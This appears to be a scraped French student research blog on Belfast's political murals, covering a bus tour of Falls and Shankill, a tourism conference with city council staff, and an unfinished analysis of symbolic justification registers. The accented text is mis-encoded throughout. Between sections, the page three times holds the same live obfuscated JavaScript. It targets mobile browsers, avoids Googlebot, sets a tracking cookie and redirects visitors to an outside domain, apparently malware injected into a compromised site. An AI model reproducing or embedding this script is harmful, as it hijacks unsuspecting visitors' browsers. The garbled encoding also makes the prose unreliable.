Serrant fort nos A�charpes et se blottissant lE?un contre lE?autre sur les siA?ges, nous A�coutionsA�la guide commenter la premiA?re partie du tour: le quartier du Titanic. Elle nous a montrA� lesA�quais oA? prenait forme le navire lA�gendaire, ainsi que les studios de film qui contribuent A�A�la transformation actuelle de la ville. Nous avons appris aussi divers faits sur Belfast; leA�navire soeur du Titanic, le S.S. Nomadic qui a A�tA� transformA� en archive national pourA�retrouver ses potentiels ancA?tres Irlandais; le marchA� de Saint-Georges qui a lieu chaque week-end; ainsi que diverses statues et endroits dits importants pour la culture de Belfast.

Bien que ces renseignements furent intA�ressants, ce na��est quE?A� lE?arrivA�e dans le quartier de Falls que lE?intA�rA?t de notre groupe sE?est mobilisA�, lorsque la guide nous a indiquA� les premiers murals. Puisque mon groupe se concentre sur la reprA�sentation des murals auprA?s des agents touristiques, nous sommes restA�s attentifs aux murals indiquA�s tout au long du parcours A� travers Falls et Shankill.

Le quartier de Falls sa��est tout de suite distinguA� par la prA�sence du drapeau tricolore Irlandais accrochA� aux fenA?tres, devant diffA�rents magasins et tachetA� un peu partout dans les rues. On remarque aussi la prA�sence de la langue gaA�lique: souvent les petits magasins portent des noms irlandais tout comme certains murals qui soutiennent la cause RA�publicaine. Nous sommes entrA�s dans le quartier depuis le sud-ouest de Falls Road et montA�s vers le nord-est.

Le premier mural que la guide nous a indiquA� se trouvait sur notre gauche: le mural de Cumann na mBan ou lE?IrishwomenE?s Council. Elle nous a rapidement racontA� lE?importance de la comtesse Markievicz qui apparaA�t dans ce mural, et son rA?le dans lE?Easter Rising. AprA?s, elle a attirA� notre attention sur le mural Plastic Bullets qui commA�more ceux qui ont A�tA� tuA�s par des balles en plastique du cA?tA� RA�publicain. Lors de la mention de ce mural, le guide nous a racontA� comment les deux communautA�s sont encore sA�parA�es par la religion, notamment dans les A�coles. On continuait le trajet le long de Falls Road avec des brA?ves indications sur les murals de The Easter Rising at the GPO Ardoyne et de SeA?n Mac Diarmada. Nous sommes passA�s A�galement devant le mural de Bobby Sands oA? la guide nous a expliquA�s quE?il A�tait le premier hunger striker mort de faim. Pas loin de ce mural se trouvait un autre qui rend hommage aux autres hunger strikers de lE?IRA. Finalement, pour conclure notre tour du quartier de Falls, le bus a continuA� son parcours en longeant le International Peace Wall. Elle a attirA� notre attention sur lE?attractivitA� touristique du mur, nous disant que cE?A�tait le plus grand a�?guestbooka�? du monde.

A� ce moment lA�, nous A�tions plusieurs A� descendre au niveau infA�rieur du bus pour A�chapper au froid et reprendre la sensation dans les mains. Traversant le No ManE?s Land, entre les barriA?res qui sA�parent les quartiers, nous sommes arrivA�s A� Shankill, une des parties loyaliste de Belfast. Nous avons remarquA� toute de suite le changement de drapeaux: celui de la Grande-Bretagne affichA� partout. Le quartier, tout comme celui de Falls, ne perdait aucune occasion da��afficher son appartenance. Bien que la guide ait pris un ton globalement neutre le long du parcours, nous avons remarquA� un changement subtile ici. LorsquE?elle nous a indiquA� le mural de The First BelfastA�BattalionA�Volunteers,A�elle rA�pA�tait A� plusieurs reprises que le paramilitaire a commis des actes dE?horreur, nous donnant lE?impression que cE?A�tait le cA?tA� E�mA�chantE? en quelques sorts du conflit. Cependant, en montrant les murals du King of Orange et du Northern Ireland Football, elle a repris son ton enthousiaste et neutre. Enfin, le tour a terminA� par Sandy Row et lE?usine de briques.

En somme, nous trouvons que le tour A�tait une bonne initiation A� la ville de Belfast. Nous A�tions surtout intA�ressA�s par la visite des quartiers de Falls et Shankill, et la grande partie que jouaient les murals et le conflit dans le tour. Pour ma part, ja��ai ressenti une sorte de pitiA� pour les habitants, longtemps piA�gA�s dans un conflit A� mon avis pas nA�cessaire. La��affichage fier des drapeaux, les murals sa��exprimant la fidA�litA� pour telle ou telle cause ma��ont fait penser A� une sorte da��endoctrinement: les habitants y vivants ont tellement la��habitude de cette division que celle-ci les rend en quelques sortes aveugles. AprA?s ce tour, je me suis posA� une premiA?re question sur le terrain: est-ce que, non seulement les agences touristiques mettent-elles en avant certains murals, mais est-il aussi possible que ces agences mettent en avant leur positionnement sur le conflit A� travers leurs guides ?

ParA�Nicole Frazier, Simon Paratte et LA�a Zignani

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

MA�thodologies & DonnA�es rA�coltA�es

[en construction]

Vous trouverez ci-dessous les diffA�rentes catA�gories de documents et de donnA�es que nous avons rA�coltA� dans le cadre de nos recherches.

Les donnA�es, ainsi que les mA�thodes utilisA�es pour les acquA�rir sont prA�sentA�es sous chacun des liens suivant.
La rA�colte des diverses donnA�es y est dA�crite et un retour rA�flexif sur le choix des diffA�rentes mA�thodes ainsi que de leurs applications sur le terrain est donnA�. Enfin l’analyse des observations effectuA�es clos chacun des liens.

Circuits touristiques
Documentation touristique et souvenir
Interviews
ConfA�rences

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ConfA�rence sur le tourisme: quel avenir pour Belfast?

Par CA�cile Walder et Estelle Pannatier

ClA�mence Lehec, 2016, ConfA�rence sur le tourisme A� Belfast, Belfast Barge.
ClA�mence Lehec, 2016, ConfA�rence sur le tourisme, Belfast Barge.

AprA?s avoir passA� une matinA�e A� la��Andy Tyrie Interpretative Centre A� East Belfast, nous sommes retournA�s au centre-ville afin da��A�couter la confA�rence de Naomi Doak et Robert Heslip sur le tourisme A� Belfast. Ces deux professionnels du tourisme travaillent pour le Belfast city council. A�La confA�rence se tenait dans la Belfast Barge, un bateau amarrA� qui abrite un musA�e maritime.

Tout da��abord, Naomi Doak a contextualisA� la situation particuliA?re de Belfast. Un des fait intA�ressant qua��elle a choisi de souligner est le fait qua��il y a plus de peace lignes (murs de sA�paration entre les communautA�s) en 2016 qua��en 1998, annA�e de la signature du a�?Good friday agreementa�?, qui marque le dA�but du processus de paix.

AprA?s avoir abordA� la situation gA�nA�rale de la ville, nos interlocuteurs ont cherchA� A� nous prA�senter les diffA�rentes pistes A� l’A�tude pour dA�velopper le tourisme.

Naomi Doak sa��est tout da��abord penchA�e sur la question sensible des murals et de leurs effets sur les touristes. Elle a soulignA� les diffA�rences frappantes entre les deux genres de reprA�sentations que la��on peut observer. Les peintures du cA?tA� rA�publicain sont parfois entourA�es da��une aura mystique, oA? la��on retrouve des A�lA�ments de la culture irlandaise et ses lA�gendes. Elles invoquent la��histoire qui lie la communautA� catholique A� la��Irlande et leur vocation est unificatrice. Elles ont pour fonction de renforcer la��identitA� irlandaise. Du cA?tA� loyaliste, le sujet des fresques est souvent plus violent et les murals sont lA� pour marquer le territoire: ils reprA�sentent des hommes armA�s et portent des messages intimidants.

Ces deux visions offertes au regard des touristes ont des rA�percussions sur leur perception du conflit, et les incitent A� prendre position pour un camp. Il A�tait intA�ressant de voir ce dernier point soulevA�, car ca��est effectivement un phA�nomA?ne que nous avons pu observer au sein de notre groupe da��A�tudiants. Ces peintures ont potentiellement des retombA�es A�conomiques importantes car elles attirent des investisseurs, en particulier dans les quartiers catholiques.

Naomi Doak et Robert Heslip ont ensuite prA�sentA� leur vision du tourisme « de masse », qua��ils jugent inadaptA� au contexte belfastois. En effet, le fait que les touristes arrivent en car dans les environs des fresques, prennent quelques photos et repartent immA�diatement sans dA�penser le moindre pound, est souvent mal perA�u par les populations locales pour lesquelles les murals reprA�sentent gA�nA�ralement des sujets encore sensibles.

Les confA�renciers ont A�voquA� deux types de dA�veloppements touristiques: le dark tourism et le phoenix tourism. Le premier cherche A� attirer les touristes en prA�sentant les A�lA�ments noirs de la��histoire de la ville (la pA�riode des Troubles, mais A�galement le naufrage du Titanic) alors que le deuxiA?me, basA� sur la mA�taphore du phA�nix qui renaA�t de ces cendres, utilise le processus de paix comme attraction touristique.

Les murals, principal sujet de notre voyage da��A�tude, n’occupent pas la mA?me place dans les deux types de tourisme. En effet, pour le dark tourism, les nouvelles fresques (axA�es sur la reconstruction, le dialogue intercommunautaire,..) ne prA�sentent pas d’intA�rA?t, puisque le public cible est attirA� par les murals liA�s au conflit. Le phoenix tourism a quant A� lui besoin da��A�lA�ments qui traduisent l’A�volution du processus de paix, dont ces nouvelles fresques font partie.

Comme la��ont soulignA� Naomi Doak et Robert Heslip, la principale embA�che au dA�veloppement da��un tourisme liA� A� la mA�moire du conflit rA�side dans le fait que la ville manque d’infrastructures appropriA�es, notamment de musA�es qui racontent tant l’histoire du conflit que celle du processus de paix. En effet, les diffA�rents acteurs politiques de la ville se montrent aujourd’hui encore incapables de produire un rA�cit commun qui conviendrait A� toutes les parties. Et cette absence rend la comprA�hension de la situation belfastoise trA?s difficile pour les visiteurs. Nous y avons nous-mA?mes A�tA� confrontA�s durant notre sA�jour. En effet, lors de nos diffA�rentes visites tant du cA?tA� rA�publicain qu’unioniste, les rA�cits des diffA�rents acteurs, notamment ceux des Black Cab, A�taient empreints da��une vision encore trA?s sA�grA�guA�e du conflit.

Un deuxiA?me autre problA?me se pose en parallA?le, selon nos interlocuteurs, celui du rA�cit de la violence en lui-mA?me. En effet, raconter la violence, c’est aussi la faire revivre. Or, les populations ne sont peut-A?tre pas prA?tes A� se replonger dans cette histoire dont le souvenir est encore trop vif.

Ce qui est ressorti de cette confA�rence sont les nombreuses interrogations des responsables du tourisme face au dilemme de la mise en tourisme de Belfast. Ils nous ont demandA� A� plusieurs reprises si, en tant que visiteurs A�trangers, nous avions certaines attentes touristiques et dans quelles infrastructures celles-ci pourraient se traduire. Quelques A�lA�ments A�voquA�s par les confA�renciers sur le contexte actuel nous ont A�galement permis de mieux comprendre certains des enjeux auxquels la ville va devoir faire face dans le futur: la cA�lA�bration du centenaire de la��Easter rising, qui marque la��anniversaire de la proclamation de la premiA?re RA�publique da��Irlande, mais A�galement la perspective da��un A�ventuel Brexit, qui causerait selon les confA�renciers, un grand prA�judice A� la��Irlande du Nord, dont nombre de financements proviennent de la��Union europA�enne.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Des symboles pour se justifier

A�Quels sont les diffA�rents registres de justification par les deux partis ?

Introduction : Plusieurs maniA?res de se justifier

Par Darell Bloch, AngA?le Canelli et Louis Romaneschi

Avant propos :

Dans cette A�tude nous traiterons des registres de justifications des deux partis. Pour faciliter la comprA�hension de notre recherche il est important de comprendre ce qua��est un registre de justification et A�galement comment qualifier les deux partis.

On peut appeler registre de justification un ensemble de caractA�ristiques trouvA�es dans un texte, un discours ou dans toute forme da��expression visuelle visant A� justifier la ou les action(s) rA�alisA�e(s) par la��acteur au regard du spectateur.

En ce qui concerne les deux partis, nous utiliserons donc trois faA�ons de les qualifier, A� savoir :

  • le parti plutA?t da��origine irelandaise, qui est nationaliste, rA�publicain et catholique;
  • le parti plutA?t da��origine anglaise, qui est unioniste, loyaliste et protestant.

  1. Introduction : Plusieurs maniA?res de se justifier

Les murals ne sont pas neutres. Ces peintures apparaissent petit A� petit dans les rues de Belfast en parallA?le avec le conflit qui oppose rA�publicains irlandais aux loyalistes, fidA?les A� la couronne britannique. Ces peintures murales ont un caractA?re fondamentalement politique : les partis belligA�rants utilisent ce moyen graphique afin de faire de la propagande, dA�marquer leur territoire, da��acquA�rir de nouveaux sympathisants, ou alors de menacer la��ennemi. Elles se positionnent da��un cA?tA� ou de la��autre des partis engagA�s en faisant rA�fA�rence A� des symboles, A� des personnages et A� des A�vA�nements historiques liA�s A� la��hA�ritage culturel de chaque parti. En utilisant cette dialectique les deux partis justifient leur prise de position dans le conflit. Chacune des murals comporte donc une dimension fortement idA�ologique malgrA� leur apparence pouvant paraA�tre neutre. Cette mobilisation de symboles religieux, militaristes, culturels et nationalistes sur les murals peut A?tre perA�ue comme un ensemble da��arguments lA�gitimant la��existence et les revendications de chacun des partis. A�Ces muralsA�ont une capacitA� da��impact politique directe sur la population et sur tout autre observateur puisqu’elles sont situA�esA�dans la��espace public. Apparaissant sous une forme artistique, les murals sont en rA�alitA� une forme de propagande visant A� ressasser le spectre de la��opposition entre catholiques et protestant, les murs de Belfast deviennent alors un enjeux important du conflit. A�La��objectif de notre recherche est de mettre en lumiA?re les diffA�rents registres de justification mobilisA�s par chacun des partis dans les murals et da��expliciter le sens que les partis veulent donner aux murals.

Pour ce faire nous allons analyser de maniA?re comparative les murals unionistes et les murals rA�publicaines. Nous prA�senterons un tableau graphique rA�pertoriant les symboles les plus frA�quents et explicitant leurs significations et histoire. Cette classification sera une clef de lecture de notre travail, qui mobilisera ces symboles afin da��expliquer les diffA�rents registres de justification du conflit. En effet, ce lexique appuiera notre recherche, qui dA�taillera les diffA�rentes maniA?res par lesquelles les partis mobilisent ce langage graphique A� leurs fins politiques et culturelles. Nous avons pu mis en exergueA�plusieurs registres de justification ; tout da��abord la��exacerbation de registres culturels irlandais ou loyalistes, le ralliement A� des conflits internationaux, et enfin la victimisation de chacun des partis.

Exacerbation de la culture :

Le premier registre de justification que nous traitonsA�est celui de l’exacerbation culturelle, ou ce que nous intitulonsA�a�?la��hyperculturalisationa�?. Cet outil conceptuel utilisA� pour notre analyse se dA�finit par la volontA� da��une communautA� de se crA�er et de mobiliser un patrimoine culturel qui lui est propre. La��hyperculturalisation se caractA�rise par la grande utilisation de toutes sortes de particularitA�s culturelles communautaires A� des fins de diffA�renciation, par rapport au parti adverse. Ca��est une crA�ation de la��altA�ritA�, un processus qui a pour but de renforcer la��appartenance A� la��identitA� culturelle de son parti. Dans cette pA�riode post-conflit, A� Belfast, cette exacerbation de la culture est bel et bien encore utilisA�e, A� des fins politiques, historiques et mA�morielles. Cette logique que la��on pourrait considA�rerA�comme une mobilisation trA?s marquA�e da��un hA�ritage, va diffA�rer entre protestants et catholiques, et dA�passer le cadre des murals en se retrouvant dans plusieurs aspects de la vie quotidienne.

A la��A�chelle gA�ographique da��une ville qui na��est pas plus grande que GenA?ve, ces logiques da��hyperculturalisation peuvent en effet A?tre trA?s marquA�es: on identifierait un protestant ou un catholique A� travers son style vestimentaire, sa faA�on de sa��exprimer, son lieu de rA�sidence. Nous retrouvons ces aspects de diffA�renciation que ce soit dans la��usage de la langue gaA�lique, parlA�e exclusivement par des communautA�s catholiques, ou mA?me jusque dans les sports pratiquA�s: le football A�tant plus pratiquA� par les catholiques alors que le rugby est plus commun chez les protestants. Notre sujet da��analyse A�tant les murales, nous ne nous attarderons guA?re sur la��exacerbation culturelle dans les comportements sociaux, mais traiterons le sujet A� travers les symboles prA�sent dans la��iconographie des murales. Nous procA�derons en faisant une analyse comparative des logiques da��utilisation symbolique de chacun des partis, tout en illustrant nos propos avec quelques exemples. Par ailleurs, notre grille des symboles (annexe 1) permettra de rA�fA�rencer et de situer les symboles les plus importants afin de ne pas reprendre ces A�lA�ments dans la��analyse.

Tout da��abord, aprA?s avoir analyser les murales photographiA�es lors de nos terrains, nous pouvons distinguer dans les grandes lignes des logiques de mobilisation symboliques, allant sur des axes distincts, selon la��appartenance de la murale au clan unioniste ou rA�publicain.

Chez les unionistes, le registre symbolique est trA?s militarisA�A�etA�rendu historique; ce qui donne aux murales protestantes une dimension politique assez marquA�e. Ce constat se fait tout da��abord par leur composition, souvent rA�gie pour mettre en avant un blason, entourA� da��autres symboles (drapeaux, miniatures de personnages). La position centrale du blason qui incorpore la plupart du temps un drapeau de la��Union Jack, une couronne et la main rouge de la��Ulster (voir tableau en annexe), rappelle la centralitA� du pouvoir monarchique, avec les A�lA�ments qui la��entourent relA�guA�s au second plan, de par leur subordination hiA�rarchique. Dans ce cas, nous sommes face A� une vA�ritable prise de position en faveur de la culture monarchique, exacerbA�e par la mise en place da��une justification A� travers plusieurs symboles unionistes. Des A�lA�ments voulant dA�montrer la force militaire et A�conomique du Royaume-Uni sont A�galement avancA�s dans les murales loyalistes. Autour du blason central, des sujets rA�currents tels que les guerres mondiales, la puissance de la��Empire et 